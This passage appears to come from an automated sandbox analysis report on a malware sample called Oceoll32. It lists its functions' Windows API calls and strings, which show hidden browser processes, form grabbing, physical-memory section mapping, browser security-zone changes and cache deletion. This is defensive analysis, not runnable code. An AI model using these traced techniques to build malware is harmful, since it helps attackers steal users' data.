                            • Opcode ID: db39d86638ff862d2fb6c91229f091ab8a43fd21800a492105b3074faeac2b45
                            • Instruction ID: 18f08bfc30c9890c11dd244c38850a50baba5aa484248b9ca7ce56826a71177a
                            • Opcode Fuzzy Hash: db39d86638ff862d2fb6c91229f091ab8a43fd21800a492105b3074faeac2b45
                            • Instruction Fuzzy Hash: 328163B1E08228ABDB21A6658D46BD977BCDB04304F5105F7E60CB21C1E67C7F948F99
                            Function 004052E0 Relevance: 31.6, APIs: 13, Strings: 5, Instructions: 115sleepstringprocessCOMMON
                            Download Yara Rule
                            APIs
                            • strcat.CRTDLL(?,\Iexplore.exe ,?,?,?,?,?,?,?,00000104,?,?,?,?,?,?), ref: 004052F8
                            • strcat.CRTDLL(?,?,?,\Iexplore.exe ,?,?,?,?,?,?,?,00000104,?,?,?,?), ref: 0040530B
                              • Part of subcall function 0040431F: GetCurrentThreadId.KERNEL32 ref: 00404341
                              • Part of subcall function 0040431F: GetThreadDesktop.USER32(00000000), ref: 00404347
                            • memset.CRTDLL(?,00000000,00000044,?,?,?,\Iexplore.exe ,?,?,?,?,?,?,?,00000104,?), ref: 0040532C
                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0040539F
                            • CloseHandle.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004053B2
                            • sprintf.CRTDLL(?,%s%u - Microsoft Internet Explorer,MicroSoft-Corp,?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004053D4
                            • Sleep.KERNEL32(00007800,00000000,00000000,00000044,?), ref: 00405426
                            • Sleep.KERNEL32(0000F000,00007800,00000000,00000000,00000044,?), ref: 00405439
                            • GetWindowTextA.USER32(00000000,?,00000104), ref: 00405451
                            • DeleteFileA.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405499
                            • LocalFree.KERNEL32(?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004054A5
                            • TerminateProcess.KERNEL32(?,00000000,?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004054B2
                            • CloseHandle.KERNEL32(?,?,00000000,?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004054BD
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.1985346265.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.1985309091.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985391617.000000000042A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985423351.000000000042E000.00000020.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985446853.000000000042F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985470156.0000000000436000.00000020.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985499870.0000000000438000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Oceoll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseHandleProcessSleepThreadstrcat$CreateCurrentDeleteDesktopFileFreeLocalTerminateTextWindowmemsetsprintf
                            • String ID: %s%u - Microsoft Internet Explorer$D$MicroSoft-Corp$X-okRecv11$\Iexplore.exe
                            • API String ID: 1202517094-2261298365
                            • Opcode ID: e98e409644201e6de021147ee2f0c1805f35588af9548cc9b8076052c01221a7
                            • Instruction ID: a5954b523feb805065d44168e487e19d6cbd8b1c6e851fe6a795fce517e83f05
                            • Opcode Fuzzy Hash: e98e409644201e6de021147ee2f0c1805f35588af9548cc9b8076052c01221a7
                            • Instruction Fuzzy Hash: 4F416572E442186ADB20AA65CC46BDDB3B99F50305F1444F7E208F61D1DABCAEC48F59
                            Function 00401B9F Relevance: 26.7, APIs: 11, Strings: 4, Instructions: 487memoryCOMMON
                            Download Yara Rule
                            APIs
                            • SysAllocString.OLEAUT32(value), ref: 00401BCC
                              • Part of subcall function 004017AC: CoInitialize.OLE32(00000000), ref: 004017CC
                              • Part of subcall function 004017AC: CLSIDFromString.OLE32({9BA05972-F6A8-11CF-A442-00A0C90A8F39},?), ref: 004017DA
                              • Part of subcall function 004017AC: CoCreateInstance.OLE32(?,00000000,?,0042CD50,?,{9BA05972-F6A8-11CF-A442-00A0C90A8F39},?), ref: 00401803
                            • _sleep.CRTDLL(00000000), ref: 00401BFD
                            • GetForegroundWindow.USER32(00000000), ref: 00401C02
                              • Part of subcall function 0040185F: GetWindowTextA.USER32(?,?,?), ref: 004018E2
                            • memcpy.CRTDLL(00418F40,?,?), ref: 00401D6D
                            • memcpy.CRTDLL(?,00418F40,?), ref: 00401F34
                            • _sleep.CRTDLL(00000000), ref: 00401F4A
                            • sprintf.CRTDLL(?,%s FORM_%X,?,?,00000000), ref: 00401F77
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.1985346265.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.1985309091.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985391617.000000000042A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985423351.000000000042E000.00000020.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985446853.000000000042F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985470156.0000000000436000.00000020.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985499870.0000000000438000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Oceoll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: StringWindow_sleepmemcpy$AllocCreateForegroundFromInitializeInstanceTextsprintf
                            • String ID: %s %X%c$%s FORM_%X$%s%c$value
                            • API String ID: 3510745994-3693252589
                            • Opcode ID: 97066158e7caddc246d118ad30601bc5e86c518a965b60cc81196b9f5f35fe85
                            • Instruction ID: 207a0c2c24704257dc82047f11ad41d7b25eba1db427a6dda8aff0efe7f4a5ef
                            • Opcode Fuzzy Hash: 97066158e7caddc246d118ad30601bc5e86c518a965b60cc81196b9f5f35fe85
                            • Instruction Fuzzy Hash: 2112DC71A002199FDB62DB68CD44BDAB7F9BB0C304F5040FAA588E7290D7B4AAC58F55
                            Function 00402822 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 34libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • GetModuleHandleA.KERNEL32(ntdll.dll,00000000,69D467A1,00402E1B,00000000,69D467A1,?,?,00406F1E,00000000,00000000,00000000,QueenKarton_12,%s\%s,00429080,dnkkq.dll), ref: 0040283A
                            • GetProcAddress.KERNEL32(00000000,RtlInitUnicodeString), ref: 00402847
                            • GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 00402857
                            • GetProcAddress.KERNEL32(00000000,NtOpenSection), ref: 0040286D
                            • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 0040287D
                            • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 0040288D
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.1985346265.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.1985309091.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985391617.000000000042A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985423351.000000000042E000.00000020.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985446853.000000000042F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985470156.0000000000436000.00000020.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985499870.0000000000438000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Oceoll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$HandleModule
                            • String ID: NtMapViewOfSection$NtOpenSection$NtUnmapViewOfSection$RtlInitUnicodeString$RtlNtStatusToDosError$ntdll.dll
                            • API String ID: 667068680-1987783197
                            • Opcode ID: f3f948102971a568e61a5bb1a738835a59e2c1009918de6079867c1c535b5a8b
                            • Instruction ID: 9d3c92be313ac2760b75685e9acc68d9338f811418752029c31410863af0f615
                            • Opcode Fuzzy Hash: f3f948102971a568e61a5bb1a738835a59e2c1009918de6079867c1c535b5a8b
                            • Instruction Fuzzy Hash: BCF03A21B642206B93126B327D4293E36689792B19395003FF840F6191DB7C09225F9F
                            Function 00402E06 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 337libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00402822: GetModuleHandleA.KERNEL32(ntdll.dll,00000000,69D467A1,00402E1B,00000000,69D467A1,?,?,00406F1E,00000000,00000000,00000000,QueenKarton_12,%s\%s,00429080,dnkkq.dll), ref: 0040283A
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,RtlInitUnicodeString), ref: 00402847
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 00402857
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,NtOpenSection), ref: 0040286D
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 0040287D
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 0040288D
                            • GetVersion.KERNEL32 ref: 00402E22
                            • LoadLibraryA.KERNEL32 ref: 00402E91
                            • GetProcAddress.KERNEL32 ref: 00402EC5
                            • IsBadReadPtr.KERNEL32(?,00001000), ref: 00402F75
                            • GlobalMemoryStatus.KERNEL32(?), ref: 00402F9F
                            • CloseHandle.KERNEL32(?), ref: 00403065
                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 004030EA
                            • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040315B
                            • IsBadWritePtr.KERNEL32(00000000,00001000), ref: 004031F1
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.1985346265.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.1985309091.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985391617.000000000042A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985423351.000000000042E000.00000020.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985446853.000000000042F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985470156.0000000000436000.00000020.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985499870.0000000000438000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Oceoll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$Handle$Module$CloseGlobalLibraryLoadMemoryQueryReadStatusVersionVirtualWrite
                            • String ID: kernel32.dll
                            • API String ID: 2089743848-1793498882
                            • Opcode ID: 4f42c9a603f3b22a608ddecb7cf3016b4a0286024c9d1ec82fce5a6e54f44313
                            • Instruction ID: cfd5926590b061e949c3a24607155209ead47d6dc4f6dfca132d0ef3b1a5cdf0
                            • Opcode Fuzzy Hash: 4f42c9a603f3b22a608ddecb7cf3016b4a0286024c9d1ec82fce5a6e54f44313
                            • Instruction Fuzzy Hash: F6F19070D042B88BEB328F64DD483E9BBB1AB55306F0481EBD588662D2C2B85FC5CF55
                            Function 004037AA Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 53COMMON
                            Download Yara Rule
                            APIs
                            • printf.CRTDLL([length=%i] [summ=%i],?,00000000), ref: 004037DD
                            • printf.CRTDLL(HEX: ,[length=%i] [summ=%i],?,00000000), ref: 004037EE
                            • printf.CRTDLL(%02X ,00000000), ref: 00403804
                            • printf.CRTDLL(TXT: '%s',?), ref: 0040382C
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.1985346265.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.1985309091.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985391617.000000000042A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985423351.000000000042E000.00000020.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985446853.000000000042F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985470156.0000000000436000.00000020.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985499870.0000000000438000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Oceoll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: printf
                            • String ID: TXT: '%s'$%02X $HEX: $X4$[length=%i] [summ=%i]
                            • API String ID: 3524737521-4004101572
                            • Opcode ID: ca4ded32e23903f7249d6c5dbeb3a47121f77b3b45ed42eb0d7ff3160f68b428
                            • Instruction ID: a8ef6db4a05ad48ab0456940bf437e850f92713de92630681f76b68ebadef0f7
                            • Opcode Fuzzy Hash: ca4ded32e23903f7249d6c5dbeb3a47121f77b3b45ed42eb0d7ff3160f68b428
                            • Instruction Fuzzy Hash: 88016B62A04254BED7006FA7CC82A6F7FDCAB4175AF2080BEF545730C0D1B86F41D6A6
                            Function 004054D7 Relevance: 15.1, APIs: 10, Instructions: 109stringthreadmemoryCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlenA.KERNEL32(?), ref: 004054F1
                            • lstrlenA.KERNEL32(?,?), ref: 00405505
                            • lstrlenA.KERNEL32(?,?,?), ref: 00405513
                            • lstrlenA.KERNEL32(?,?,?,?), ref: 0040551F
                            • LocalAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 0040554B
                            • memcpy.CRTDLL(00000001,?,?,00000000,?,?,?,?,?), ref: 0040556A
                            • CreateThread.KERNEL32(00000000,00000000,Function_00005133,00000000,00000000,?), ref: 004055DE
                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006,?,-00000005,?), ref: 004055EE
                            • GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006,?), ref: 004055F8
                            • CloseHandle.KERNEL32(00000000,00000000,?,00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006), ref: 004055FE
                            Memory Dump Source
                            • Source File: 00000007.00000002.1985346265.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.1985309091.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985391617.000000000042A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985423351.000000000042E000.00000020.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985446853.000000000042F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985470156.0000000000436000.00000020.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985499870.0000000000438000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Oceoll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Thread$AllocCloseCodeCreateExitHandleLocalObjectSingleWaitmemcpy
                            • String ID:
                            • API String ID: 2845097592-0
                            • Opcode ID: 7ec933356805a86d395f76af41b9b2d9f18e99f1d3eeeb5c371ae48cad7448a7
                            • Instruction ID: 017c82820a2f145177c9e28e2e3f5c0bebc6ad2cdfe5315ab2aa4ad5daf85086
                            • Opcode Fuzzy Hash: 7ec933356805a86d395f76af41b9b2d9f18e99f1d3eeeb5c371ae48cad7448a7
                            • Instruction Fuzzy Hash: 5E31D721A04159BACF01DFA6CC01AAEB7F9AF44318F144476F904E7291E63CDB15C7A9
                            Function 00405F5B Relevance: 13.6, APIs: 9, Instructions: 64stringthreadmemoryCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlenA.KERNEL32(?), ref: 00405F73
                            • lstrlenA.KERNEL32(?,?), ref: 00405F7E
                            • LocalAlloc.KERNEL32(00000040,?,?,?), ref: 00405F8D
                            • lstrlenA.KERNEL32(?,00000000,?,00000040,?,?,?), ref: 00405FA2
                            • DeleteUrlCacheEntry.WININET(?), ref: 00405FB5
                            • CreateThread.KERNEL32(00000000,00000000,Function_00005C09,00000000,00000000,?), ref: 00405FCA
                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?,00000040,?,?), ref: 00405FDD
                            • GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?,00000040), ref: 00405FE7
                            • CloseHandle.KERNEL32(00000000,00000000,?,00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?), ref: 00405FED
                            Memory Dump Source
                            • Source File: 00000007.00000002.1985346265.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.1985309091.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985391617.000000000042A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985423351.000000000042E000.00000020.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985446853.000000000042F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985470156.0000000000436000.00000020.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985499870.0000000000438000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Oceoll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Thread$AllocCacheCloseCodeCreateDeleteEntryExitHandleLocalObjectSingleWait
                            • String ID:
                            • API String ID: 794401840-0
                            • Opcode ID: 03fc3e79f5e594bfaf1f893bda151e66fa8c5b5e213fcd764589a016d7372ae4
                            • Instruction ID: 5ee1198a60b0fc2a8532ff5616a25e8349e08cf473eab22e95dc85017e90c3ca
                            • Opcode Fuzzy Hash: 03fc3e79f5e594bfaf1f893bda151e66fa8c5b5e213fcd764589a016d7372ae4
                            • Instruction Fuzzy Hash: B011CA71A082447BD701F6668C42EAFB76DDF85368F144476F600B71C2D678AF0147E9
                            Function 0040289A Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 99COMMON
                            Download Yara Rule
                            APIs
                            • GetSecurityInfo.ADVAPI32(?,00000006,?,00000000,00000000,?,00000000,?), ref: 00402976
                            • SetEntriesInAclA.ADVAPI32(00000001,00000002,?,?), ref: 00402988
                            • SetSecurityInfo.ADVAPI32(?,00000006,?,00000000,00000000,?,00000000,?,00000006,?,00000000,00000000,?,00000000,?), ref: 004029A3
                            • CloseHandle.KERNEL32(?,?,00000006,?,00000000,00000000,?,00000000,?,00000006,?,00000000,00000000,?,00000000,?), ref: 004029B1
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.1985346265.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.1985309091.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985391617.000000000042A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985423351.000000000042E000.00000020.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985446853.000000000042F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985470156.0000000000436000.00000020.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985499870.0000000000438000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Oceoll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: InfoSecurity$CloseEntriesHandle
                            • String ID: @$CURRENT_USER$\device\physicalmemory
                            • API String ID: 405656561-3357994103
                            • Opcode ID: 3f106b48de9bb5ba9ca254209248b2c107f34978da584956db3145db2ea5644b
                            • Instruction ID: 89d45d45e0a184fa7970b295066ffccd564a705ae1855cc5323f3f658fcd5c06
                            • Opcode Fuzzy Hash: 3f106b48de9bb5ba9ca254209248b2c107f34978da584956db3145db2ea5644b
                            • Instruction Fuzzy Hash: 2A41EB71E4030DAFEB108FD4DC85BEEB7B9FB04319F50403AEA00BA191D7B9595A8B59
                            Function 0040509B Relevance: 12.0, APIs: 1, Strings: 7, Instructions: 43COMMON
                            Download Yara Rule
                            APIs
                            • sprintf.CRTDLL(?,SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u,00000000), ref: 004050CD
                            Strings
                            • Software\Microsoft\Windows\CurrentVersion\Internet Settings, xrefs: 004050FF
                            • 1601, xrefs: 004050D4
                            • SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u, xrefs: 004050C1
                            • GlobalUserOffline, xrefs: 004050FA
                            • BrowseNewProcess, xrefs: 00405113
                            • yes, xrefs: 0040510E
                            • .DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess, xrefs: 00405118
                            Memory Dump Source
                            • Source File: 00000007.00000002.1985346265.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.1985309091.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985391617.000000000042A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985423351.000000000042E000.00000020.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985446853.000000000042F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985470156.0000000000436000.00000020.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985499870.0000000000438000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Oceoll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: sprintf
                            • String ID: .DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess$1601$BrowseNewProcess$GlobalUserOffline$SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u$Software\Microsoft\Windows\CurrentVersion\Internet Settings$yes
                            • API String ID: 590974362-546450379
                            • Opcode ID: ad57bd7a5e5ee7174c091d0a3ea72984deb32bb5560bbbda773b8a609c7be674
                            • Instruction ID: cd0aaffbc0bd71aa605591c0976343fec0ffbebd6d6d4fedce8ce2f9217411d7
                            • Opcode Fuzzy Hash: ad57bd7a5e5ee7174c091d0a3ea72984deb32bb5560bbbda773b8a609c7be674
                            • Instruction Fuzzy Hash: 24F07DF2F883587EE710A1699C47F8D765907A1704FA400A7BA44B10C2D0FE56C6826D
                            Function 004077E4 Relevance: 10.6, APIs: 7, Instructions: 83windowCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.1985346265.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.1985309091.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985391617.000000000042A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985423351.000000000042E000.00000020.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985446853.000000000042F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985470156.0000000000436000.00000020.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985499870.0000000000438000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Oceoll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Focus$CallProcWindow
                            • String ID:
                            • API String ID: 2401821148-0
                            • Opcode ID: 92e1ce8f7ee7a46a278bda77c005b4e0a5389e500612bd3ca87d360d572643d3
                            • Instruction ID: 67d25c2989ca0d32993d4aa71a0b11dc39683739a3ff9c0c7d6bcfde353c753a
                            • Opcode Fuzzy Hash: 92e1ce8f7ee7a46a278bda77c005b4e0a5389e500612bd3ca87d360d572643d3
                            • Instruction Fuzzy Hash: 6F318233E082149BDF21FB29ED848DA7726A751324715C43AE550B32B1DB787C91CB6E
                            Function 004036B3 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 57fileCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 004036D7
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 004036F4
                            • WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403715
                            • WriteFile.KERNEL32(00000000,0042CC6C,00000002,?,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?,C0000000), ref: 00403728
                            • CloseHandle.KERNEL32(00000000,00000000,0042CC6C,00000002,?,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?), ref: 00403734
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.1985346265.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.1985309091.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985391617.000000000042A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985423351.000000000042E000.00000020.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985446853.000000000042F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985470156.0000000000436000.00000020.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985499870.0000000000438000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Oceoll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$Write$CloseCreateHandlePointer
                            • String ID: Y&-v
                            • API String ID: 2529654636-852306816
                            • Opcode ID: 1a2ee31b6e64b1819939f0b424d9492dfa5bc2d8a36479f3b8c11624ee1f3d36
                            • Instruction ID: 393fb1fac6dfb6d7043d4134058e676a256c67ba5a84656a07003a75d011006f
                            • Opcode Fuzzy Hash: 1a2ee31b6e64b1819939f0b424d9492dfa5bc2d8a36479f3b8c11624ee1f3d36
                            • Instruction Fuzzy Hash: A401A772B4461439F62165758C43F9E365D8B41B78F208136F711BB1C1D6F97E0142BD
                            Function 00405613 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78COMMON
                            Download Yara Rule
                            APIs
                            • FindFirstUrlCacheEntryA.WININET(*.*,?,00001F40), ref: 00405654
                            • _stricmp.CRTDLL(?,?), ref: 00405679
                            • FindNextUrlCacheEntryA.WININET(00000000,?,00001F40), ref: 004056C0
                            • _stricmp.CRTDLL(?,?), ref: 004056D6
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.1985346265.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.1985309091.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985391617.000000000042A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985423351.000000000042E000.00000020.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985446853.000000000042F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985470156.0000000000436000.00000020.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985499870.0000000000438000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Oceoll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CacheEntryFind_stricmp$FirstNext
                            • String ID: *.*
                            • API String ID: 747601842-438819550
                            • Opcode ID: ba5afd5151c0520d6d715a10c5df759dc41a82144f0bc2f8a3a4ef8e8a54dfaf
